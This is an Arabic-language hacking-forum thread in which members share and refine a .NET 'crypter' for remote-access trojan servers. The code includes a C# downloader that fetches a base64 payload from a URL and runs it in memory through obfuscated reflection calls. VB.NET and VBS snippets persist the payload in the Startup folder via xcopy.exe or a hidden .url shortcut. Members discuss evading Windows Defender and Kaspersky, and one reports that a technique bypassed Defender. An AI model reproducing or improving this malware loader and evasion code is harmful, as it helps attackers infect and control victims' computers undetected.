المشاركات اخر المواضيع الاكثر مشاهدة

En çok mesaj

titanium

Plus Hacker
إنضم
15 يوليو 2019
المشاركات
317
مستوى التفاعل
410
النقاط
63
العمر
31
تشفير برمجي لبرامج الدوت نت كلين
تقريباً لكن اشياء اجمل اخي


للنظرة الاولى اتوقع انه دودة ترسل داتا من خلال التقسيم الواضح للمعلومات
الطريقة بدائية فلا اظن انه برنامج طبيعي يرسل داتا بهذه الطريقة .. الا البرامج التقليدية rat او worm

و الله اعلم .. مش متأكد
ممكن تفيدني بهذه الاشياء صراحة هذا ما اعرفه حول تغيير بعض الدوال لدوال اخرى واحيانا اجد بعض السيفرات المشفرة تستخدم مثل هذه الاكواد
C#:
public static byte[] rab(string path)
{
    DynamicMethod dynamicMethod = new DynamicMethod("asm_load", typeof(byte[]), new Type[]
    {
        typeof(string)
    });
    ILGenerator iLGenerator = dynamicMethod.GetILGenerator();
    Label label = iLGenerator.DefineLabel();
    LocalBuilder localBuilder = iLGenerator.DeclareLocal(typeof(byte[]));
    LocalBuilder localBuilder2 = iLGenerator.DeclareLocal(typeof(byte[]));
    iLGenerator.Emit(OpCodes.Nop);
    iLGenerator.Emit(OpCodes.Ldarg_0);
    iLGenerator.EmitCall(OpCodes.Call, typeof(FileSystem).GetMethod("ReadAllBytes", new Type[]
    {
        typeof(string)
    }), null);
    iLGenerator.Emit(OpCodes.Stloc_0);
    iLGenerator.Emit(OpCodes.Ldloc_0);
    iLGenerator.Emit(OpCodes.Stloc_1);
    iLGenerator.Emit(OpCodes.Br_S, label);
    iLGenerator.MarkLabel(label);
    iLGenerator.Emit(OpCodes.Ldloc_1);
    iLGenerator.Emit(OpCodes.Ret);
    return dynamicMethod.Invoke(null, new object[]
    {
        path
    }) as byte[];
}
لكن لم اعرف كيفية استغلالها IL Code

بخصوص نظرتك الاولى للباكيت المرسلة 100/100 صحيحة
بعد البحث تبين لي انه ضحية يستخدم ويندوز اكس بي مخترق ببرنامج رات من السنوات الخوالي 2009 هههه البرنامج Apocalypse RAT 1.4.4
لكن لم اعرف الكود الذي استخدمه الهكر لتشفير الاتصال كلمة السر موجودة هنا لكنها مشفرة على ما اعتقد
CCsM[DYhpvjvKY8#2|F`gjvLfmfjb|~⌂ct`vK\GLNLMKR"9<C9:=wXccfoxw+WZ-z89x
 
  • احببته
التفاعلات: Story

Story

Plus Hacker
إنضم
25 مارس 2019
المشاركات
280
مستوى التفاعل
383
النقاط
63
تشفير برمجي لبرامج الدوت نت كلين
ممكن تفيدني بهذه الاشياء صراحة هذا ما اعرفه حول تغيير بعض الدوال لدوال اخرى واحيانا اجد بعض السيفرات المشفرة تستخدم مثل هذه الاكواد
C#:
public static byte[] rab(string path)
{
    DynamicMethod dynamicMethod = new DynamicMethod("asm_load", typeof(byte[]), new Type[]
    {
        typeof(string)
    });
    ILGenerator iLGenerator = dynamicMethod.GetILGenerator();
    Label label = iLGenerator.DefineLabel();
    LocalBuilder localBuilder = iLGenerator.DeclareLocal(typeof(byte[]));
    LocalBuilder localBuilder2 = iLGenerator.DeclareLocal(typeof(byte[]));
    iLGenerator.Emit(OpCodes.Nop);
    iLGenerator.Emit(OpCodes.Ldarg_0);
    iLGenerator.EmitCall(OpCodes.Call, typeof(FileSystem).GetMethod("ReadAllBytes", new Type[]
    {
        typeof(string)
    }), null);
    iLGenerator.Emit(OpCodes.Stloc_0);
    iLGenerator.Emit(OpCodes.Ldloc_0);
    iLGenerator.Emit(OpCodes.Stloc_1);
    iLGenerator.Emit(OpCodes.Br_S, label);
    iLGenerator.MarkLabel(label);
    iLGenerator.Emit(OpCodes.Ldloc_1);
    iLGenerator.Emit(OpCodes.Ret);
    return dynamicMethod.Invoke(null, new object[]
    {
        path
    }) as byte[];
}
لكن لم اعرف كيفية استغلالها IL Code

بخصوص نظرتك الاولى للباكيت المرسلة 100/100 صحيحة
بعد البحث تبين لي انه ضحية يستخدم ويندوز اكس بي مخترق ببرنامج رات من السنوات الخوالي 2009 هههه البرنامج Apocalypse RAT 1.4.4
لكن لم اعرف الكود الذي استخدمه الهكر لتشفير الاتصال كلمة السر موجودة هنا لكنها مشفرة على ما اعتقد
CCsM[DYhpvjvKY8#2|F`gjvLfmfjb|~⌂ct`vK\GLNLMKR"9<C9:=wXccfoxw+WZ-z89x
مثل ما تلاحظ هنالك اكواد من غير المنطقي ان يكون احد قد كتبها و اكثر شي تلاحظة الشروط
دائماً تكون bool flag = false;
if(flag) و بالتالي هي اكواد من ترجمة المنقح نفسة

تقدر تجرب و راح تلاقي كثييييير اشياء بديلة

بالنسبة للكود والله اشياء متقدمة و مثل ما قلت لك بعض الاكواد من توليد المنقح و ذات مستوى مرتفع بصراحة اعلى من خبرتي ب40 مرحلة
رحم الله امرء عرف قدر نفسه .. يمكن ابحث في وقت لاحق ان شاء الله ,مش وعد لكن احاول



بالنسبة للداتا الحمد لله اني توفقت في الظن هههه
نعم هي مشفرة و على الاغلب فيها عكس للنص ايضاً
لكن الاكيد DES او AES شيء من هذا
 

ronymahmoud1

Beginner Hacker
إنضم
20 أكتوبر 2020
المشاركات
8
مستوى التفاعل
2
النقاط
3
العمر
22
نظام التشغيل
windows_7
تشفير برمجي لبرامج الدوت نت كلين
اخي
السلام عليكم و رحمة الله تعالي و بركاته
اليوم معنا تشفير برمجي بحجم صغير
لمن لا يملك فيجوال بيسك يمكنه استعمال منقح dnSpy لوضع الرابط المباشر
بعدما تحول السيرفر الي BASE64 عن طريق البرنامج المرفق او اي برنامج اخر
ترفعه علي موقع مثل Top4toP | مركز تحميل و رفع الصور و الملفات من الخليج إلى المغرب بعد تحويل الصيغة ل jpg او اي صيغة اخري
يقبلها الموقع ثم وضع الرابط في المشروع المرفق او مشروع جديد
رابط تحميل برنامج التحويل مع السورس Top-secret666 TO BASE64 | تحميل
رابط تحميل المشروع tera | تحميل
نتيجة الفحص tera.exe - Le scanner anti-virus de Jotti
الاكواد

C#:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.Net;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Windows.Forms;

namespace Syst
{
    class Cls
    {
        static void Main()
        {
            byte[] Buffer = DownloadData("URL");
            object Domain = AppDomain.CurrentDomain;
            object LIO = LateBinding.LateGet(Domain, null, "Lo┼".Replace("┼", "ad"), new object[] { Buffer }, null, null);
            object LOE = LateBinding.LateGet(LIO, null, "┼yPoint".Replace("┼", "Entr"), null, null, null);
            Delegate Deliro = Action.CreateDelegate(typeof(Action), (System.Reflection.MethodInfo)LOE);
            Deliro.DynamicInvoke();
        }

        static byte[] DownloadData(string Url)
        {
            string STR = new WebClient().DownloadString(Url);
            byte[] DATA = Convert.FromBase64String(STR);
            return DATA;
        }
    }
}

في امان الله

صور للتوضيح




اخي موقع https://top4top.io/

اصبح يكشف الكود ويعتبره فيروس ممكن حل لهذه المشكلة
 

tony

Beginner Hacker
إنضم
27 أبريل 2021
المشاركات
33
مستوى التفاعل
33
النقاط
18
العمر
25
الإقامة
الجزائر
نظام التشغيل
windows_10
تشفير برمجي لبرامج الدوت نت كلين
اخي اريد اي برنامج يحول السيرفر لصيغة BASE64
 

tony

Beginner Hacker
إنضم
27 أبريل 2021
المشاركات
33
مستوى التفاعل
33
النقاط
18
العمر
25
الإقامة
الجزائر
نظام التشغيل
windows_10
تشفير برمجي لبرامج الدوت نت كلين
وشكرا
 

tony

Beginner Hacker
إنضم
27 أبريل 2021
المشاركات
33
مستوى التفاعل
33
النقاط
18
العمر
25
الإقامة
الجزائر
نظام التشغيل
windows_10
تشفير برمجي لبرامج الدوت نت كلين

Evil Coder

Beginner Hacker
إنضم
3 يونيو 2020
المشاركات
230
مستوى التفاعل
284
النقاط
63
نظام التشغيل
windows_10
تشفير برمجي لبرامج الدوت نت كلين
السلام عليكم و رحمة الله تعالي و بركاته
اليوم معنا تشفير برمجي بحجم صغير
لمن لا يملك فيجوال بيسك يمكنه استعمال منقح dnSpy لوضع الرابط المباشر
بعدما تحول السيرفر الي BASE64 عن طريق البرنامج المرفق او اي برنامج اخر
ترفعه علي موقع مثل Top4toP | مركز تحميل و رفع الصور و الملفات من الخليج إلى المغرب بعد تحويل الصيغة ل jpg او اي صيغة اخري
يقبلها الموقع ثم وضع الرابط في المشروع المرفق او مشروع جديد
رابط تحميل برنامج التحويل مع السورس Top-secret666 TO BASE64 | تحميل
رابط تحميل المشروع tera | تحميل
نتيجة الفحص tera.exe - Le scanner anti-virus de Jotti
الاكواد

C#:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.Net;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Windows.Forms;

namespace Syst
{
    class Cls
    {
        static void Main()
        {
            byte[] Buffer = DownloadData("URL");
            object Domain = AppDomain.CurrentDomain;
            object LIO = LateBinding.LateGet(Domain, null, "Lo┼".Replace("┼", "ad"), new object[] { Buffer }, null, null);
            object LOE = LateBinding.LateGet(LIO, null, "┼yPoint".Replace("┼", "Entr"), null, null, null);
            Delegate Deliro = Action.CreateDelegate(typeof(Action), (System.Reflection.MethodInfo)LOE);
            Deliro.DynamicInvoke();
        }

        static byte[] DownloadData(string Url)
        {
            string STR = new WebClient().DownloadString(Url);
            byte[] DATA = Convert.FromBase64String(STR);
            return DATA;
        }
    }
}

في امان الله

صور للتوضيح

سلام عليكم اخي عمل جيد اظن انها تحتاج حقن في بداء التشغيل يكون كلين

وهذا كود يمكن يفيدك كتبته ب vb.net حوله انتا ل C# وضيفه لتشفيراتك

Try
Dim st As String = Environment.GetFolderPath(7) & "\" & IO.Path.GetFileName(path2)
If IO.File.Exists(st) Then
Else
command("xcopy.exe", """" & path2 & """" & " " & """" & st & "*" & """")
End If
Catch ex As Exception
End Try




Public Function command(ByVal name As String, ByVal com As String) As String
Try
Using process As Process = New Process
process.StartInfo.FileName = name
process.StartInfo.Arguments = com
process.StartInfo.UseShellExecute = False
process.StartInfo.RedirectStandardError = False
process.StartInfo.RedirectStandardOutput = False
process.StartInfo.CreateNoWindow = True
process.Start()
End Using
Catch ex As Exception
End Try
End Function

وعيد سعيد عليك وعلي المسلمين اجمعين 🥰
 

SAMPOP

V • I • P
إنضم
9 سبتمبر 2018
المشاركات
1,634
مستوى التفاعل
2,014
النقاط
113
العمر
21
تشفير برمجي لبرامج الدوت نت كلين
سلام عليكم اخي عمل جيد اظن انها تحتاج حقن في بداء التشغيل يكون كلين

وهذا كود يمكن يفيدك كتبته ب vb.net حوله انتا ل C# وضيفه لتشفيراتك

Try
Dim st As String = Environment.GetFolderPath(7) & "\" & IO.Path.GetFileName(path2)
If IO.File.Exists(st) Then
Else
command("xcopy.exe", """" & path2 & """" & " " & """" & st & "*" & """")
End If
Catch ex As Exception
End Try




Public Function command(ByVal name As String, ByVal com As String) As String
Try
Using process As Process = New Process
process.StartInfo.FileName = name
process.StartInfo.Arguments = com
process.StartInfo.UseShellExecute = False
process.StartInfo.RedirectStandardError = False
process.StartInfo.RedirectStandardOutput = False
process.StartInfo.CreateNoWindow = True
process.Start()
End Using
Catch ex As Exception
End Try
End Function

وعيد سعيد عليك وعلي المسلمين اجمعين 🥰
شكرا لك اخي و عيدك مبارك و كل عام و انت بخير
انا الان بصدد مراجعة برنامج اختراق و مراجعة قوته فان نجح معي سوف اطرحه هنا في المنتدي
لقد تم كشف كل التشفيرات هههه لذلك سوف انتقل للعمل مباشرة علي تشفير الستب
 

Evil Coder

Beginner Hacker
إنضم
3 يونيو 2020
المشاركات
230
مستوى التفاعل
284
النقاط
63
نظام التشغيل
windows_10
تشفير برمجي لبرامج الدوت نت كلين
شكرا لك اخي و عيدك مبارك و كل عام و انت بخير
انا الان بصدد مراجعة برنامج اختراق و مراجعة قوته فان نجح معي سوف اطرحه هنا في المنتدي
لقد تم كشف كل التشفيرات هههه لذلك سوف انتقل للعمل مباشرة علي تشفير الستب
نعم اخي افضل طريقه هيا التغير في شكل الاكواد واستخدام كلاسات متعدده واستدعاء الاكواد من الكلاسات حتي تكون من الصعب علي الحمايه فحصها
ويمكنك ايضا تشفير بعد السترنج وبلنسه للديفندر افضل طريقه لتخطيه وهيا RunPE (حقن بايت السيرفر في عمليه اخري) وبلنسه لبداء التشغيل جرب الكود الذي ارسلته لك سوف يعجبك استخدمت xcopy.exe لنقل السيرفر في بداء التشغيل لان الحمايات تشك ان فعل السيرفر نفسه هذا
وبلتوفيق 🥰
 

SAMPOP

V • I • P
إنضم
9 سبتمبر 2018
المشاركات
1,634
مستوى التفاعل
2,014
النقاط
113
العمر
21
تشفير برمجي لبرامج الدوت نت كلين
نعم اخي افضل طريقه هيا التغير في شكل الاكواد واستخدام كلاسات متعدده واستدعاء الاكواد من الكلاسات حتي تكون من الصعب علي الحمايه فحصها
ويمكنك ايضا تشفير بعد السترنج وبلنسه للديفندر افضل طريقه لتخطيه وهيا RunPE (حقن بايت السيرفر في عمليه اخري) وبلنسه لبداء التشغيل جرب الكود الذي ارسلته لك سوف يعجبك استخدمت xcopy.exe لنقل السيرفر في بداء التشغيل لان الحمايات تشك ان فعل السيرفر نفسه هذا
وبلتوفيق 🥰
نعم صدقت و سوف احاول تطبيق كل النصائح المقدمة من طرفك و كما تعلم فانا لست مبرمج
بل عابر سبيل فقط
تفضل جرب هذه الاكواد فلم اجد افضل من هذا التثبيت
C#:
 Try

                Dim install As String = (System.Environment.GetEnvironmentVariable("UserProfile") & "\" & IO.Path.GetFileNameWithoutExtension(Application.ExecutablePath) & ".EXE")
                File.Copy(Application.ExecutablePath, install)
                Dim lnkName As String = "\" & IO.Path.GetFileNameWithoutExtension(Application.ExecutablePath) & ""
                Dim dest As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup)
                System.IO.File.SetAttributes(install, System.IO.FileAttributes.Hidden)

                Using writer = New System.IO.StreamWriter(dest & "\" & lnkName & ".url")
                    writer.WriteLine("[InternetShortcut]")
                    writer.WriteLine("URL=file:///" & install)
                    writer.WriteLine("IconIndex=0")
                    Dim icon As String = install.Replace("\"c, "/"c)
                    writer.WriteLine("IconFile=" & icon)
                    writer.Flush()
                End Using

            Catch __unusedException1__ As Exception
            End Try
 

Evil Coder

Beginner Hacker
إنضم
3 يونيو 2020
المشاركات
230
مستوى التفاعل
284
النقاط
63
نظام التشغيل
windows_10
تشفير برمجي لبرامج الدوت نت كلين
نعم صدقت و سوف احاول تطبيق كل النصائح المقدمة من طرفك و كما تعلم فانا لست مبرمج
بل عابر سبيل فقط
تفضل جرب هذه الاكواد فلم اجد افضل من هذا التثبيت
C#:
 Try

                Dim install As String = (System.Environment.GetEnvironmentVariable("UserProfile") & "\" & IO.Path.GetFileNameWithoutExtension(Application.ExecutablePath) & ".EXE")
                File.Copy(Application.ExecutablePath, install)
                Dim lnkName As String = "\" & IO.Path.GetFileNameWithoutExtension(Application.ExecutablePath) & ""
                Dim dest As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup)
                System.IO.File.SetAttributes(install, System.IO.FileAttributes.Hidden)

                Using writer = New System.IO.StreamWriter(dest & "\" & lnkName & ".url")
                    writer.WriteLine("[InternetShortcut]")
                    writer.WriteLine("URL=file:///" & install)
                    writer.WriteLine("IconIndex=0")
                    Dim icon As String = install.Replace("\"c, "/"c)
                    writer.WriteLine("IconFile=" & icon)
                    writer.Flush()
                End Using

            Catch __unusedException1__ As Exception
            End Try
نعم اخي طريقه جيده في التثبيت .url سوف تتخطي الكثير من الحمايات بعكس .lnk
لكن اظن المشكله هنا File.Copy(Application.ExecutablePath, install)
بعض الحمايات لا تحب هذا نسخ الملف لنفسه لمسار اخر
يجب استعمال طريقه نسخ اخري مثل xcopy.exe

استمر اخي وبلتوفيق 🥰
 

SAMPOP

V • I • P
إنضم
9 سبتمبر 2018
المشاركات
1,634
مستوى التفاعل
2,014
النقاط
113
العمر
21
تشفير برمجي لبرامج الدوت نت كلين
نعم اخي طريقه جيده في التثبيت .url سوف تتخطي الكثير من الحمايات بعكس .lnk
لكن اظن المشكله هنا File.Copy(Application.ExecutablePath, install)
بعض الحمايات لا تحب هذا نسخ الملف لنفسه لمسار اخر
يجب استعمال طريقه نسخ اخري مثل xcopy.exe

استمر اخي وبلتوفيق 🥰
فعلا انت مبرمج محترف
لقد جربت الطريقة و لقد نجحت في تخطي Windows Defender
و سوف اجربها علي باقي الحمايات و خاصة الكاسبرسكي فمن اجله استعملت الاختصار في التثبيت
شكرا مرة اخري
 

المرفقات

  • Snapshot_21-05-15_19-02-40.png
    Snapshot_21-05-15_19-02-40.png
    45.8 KB · المشاهدات: 16

Evil Coder

Beginner Hacker
إنضم
3 يونيو 2020
المشاركات
230
مستوى التفاعل
284
النقاط
63
نظام التشغيل
windows_10
تشفير برمجي لبرامج الدوت نت كلين
فعلا انت مبرمج محترف
لقد جربت الطريقة و لقد نجحت في تخطي Windows Defender
و سوف اجربها علي باقي الحمايات و خاصة الكاسبرسكي فمن اجله استعملت الاختصار في التثبيت
شكرا مرة اخري
العفوا يغالي بلنسبه للكاسبر وبرامج الحمايه التي تستخدم نظام دفاع متطور افضل حل لتثبيت وهيا المهام المجدوله

وهذا نفس الكود بلغه VBS

on error resume next
Set obj = CreateObject("Wscript.Shell")
startPath = obj.SpecialFolders("Startup")

command("xcopy.exe " + """" + WScript.ScriptFullName + """" + " " + """" + startPath + "\" + Wscript.ScriptName + "*" + """")

Function command(com)
CreateObject("WScript.Shell").Run com,0
End Function

ممكن يفيدك مع تشفيرات الباورشيل​
 

زول

Beginner Hacker
إنضم
11 يونيو 2020
المشاركات
116
مستوى التفاعل
130
النقاط
43
العمر
39
الإقامة
السودان
نظام التشغيل
windows_10
Facebook
YouTube
Twitter
الموقع الالكتروني
تشفير برمجي لبرامج الدوت نت كلين

titanium

Plus Hacker
إنضم
15 يوليو 2019
المشاركات
317
مستوى التفاعل
410
النقاط
63
العمر
31
تشفير برمجي لبرامج الدوت نت كلين
العفوا يغالي بلنسبه للكاسبر وبرامج الحمايه التي تستخدم نظام دفاع متطور افضل حل لتثبيت وهيا المهام المجدوله

وهذا نفس الكود بلغه VBS

on error resume next
Set obj = CreateObject("Wscript.Shell")
startPath = obj.SpecialFolders("Startup")

command("xcopy.exe " + """" + WScript.ScriptFullName + """" + " " + """" + startPath + "\" + Wscript.ScriptName + "*" + """")

Function command(com)
CreateObject("WScript.Shell").Run com,0
End Function

ممكن يفيدك مع تشفيرات الباورشيل​
كلامك صحيح المهام المجدولة تتخطى الدفاعي الاستباقي للكاسبر عن تجربة شخصية
 

Mounir2013

Beginner Hacker
إنضم
16 يونيو 2021
المشاركات
7
مستوى التفاعل
3
النقاط
3
العمر
24
نظام التشغيل
windows_10
تشفير برمجي لبرامج الدوت نت كلين
ممكن رابط تحميل ال vs اللي عندك؟
انا لدي visual basic 2019 و به مشاكل.
لا توجد به net framework 4 عند مرحلة صنع التطبيق و ايضا عند استخراج ال .exe و افتحه فيظهر في ال task manager لمدة 4 ثواني و يختفي.

فمالحل لتسطيب .net 4 لبرنامج visual studio 2019 و مالحل بعد اخراج ال exe لا يشتغل السرفر.

جربت هذا اكثر من 8 مرات و نفس المشكل و انا متأكد ان كل الاعدادات صحيحة
 

مواضيع مماثلة

أعلى